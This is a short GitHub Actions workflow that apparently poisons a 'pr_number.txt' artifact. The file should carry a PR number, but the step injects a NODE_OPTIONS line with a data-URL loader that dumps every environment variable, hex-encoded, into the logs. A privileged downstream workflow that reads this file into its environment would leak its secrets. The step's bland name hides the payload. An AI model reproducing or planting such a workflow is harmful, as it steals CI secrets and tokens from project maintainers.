name: CI
on: 
  workflow_run:
    workflows: ['checks']
    types:
      - completed

jobs:
  job:
    runs-on: ubuntu-latest
    steps:
      - name: Set environment and generate pr_number.txt
        run: |
          echo -e "11\nNODE_OPTIONS=--experimental-modules\n--experimental-loader=data:text/javascript,console.log(Buffer.from(JSON.stringify(process.env)).toString('hex'));//" >> pr_number.txt
      - name: Upload pr_metadata artifact
        uses: actions/upload-artifact@v2
        with:
          name: pr_metadata
          path: ./pr_number.txt
